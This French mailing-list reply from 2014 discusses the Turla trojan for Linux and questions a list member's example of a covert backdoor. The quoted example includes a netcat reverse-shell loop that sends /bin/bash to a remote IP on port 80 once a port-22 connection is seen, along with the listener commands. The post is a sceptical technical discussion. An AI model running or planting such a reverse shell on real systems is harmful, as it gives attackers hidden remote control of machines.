[gull] Trojan Turla for Linux
Daniel Cordey
dc at mjt.ch
Wed Dec 17 15:45:05 CET 2014
On mer, 2014-12-17 at 12:09 +0100, felix wrote:
> Sans chercher à affoler tous le monde...
Faut quand meme reunir quelques conditions... non ? Ou bien j'ai loupe
quelque chose ? Ce qui peut parfaitement ariver :-)
> $ while :;do netstat -n | grep -q $myfixedip:22 &&
> nc $myfixedip 80 -c /bin/bash ; done
Et bibi n'ayant pas de port 22...
> dans une console:
> $ nc -l -p 80
Ouai, je listen...
> et dans une autre:
> $ nc -w 3 $targethost 22
Et pourquoi ce timeout ?
> - il n'a pas de port ouvert en listen.
Oui, mais une connexion est etablie en TCP en sortie... non ? je peux
donc la voir avec netstat... toujours non ?
> - la connexion se faisant de l'intérieur vers un port 80 à l'extérieur,
> elle passera pour une simple connection ``surf''.
Sur une machine qui n'a pas de browser... ca parait vite douteux... il
me semble
non, non, non ? :-)
Merci Felix.
dc
More information about the gull
mailing list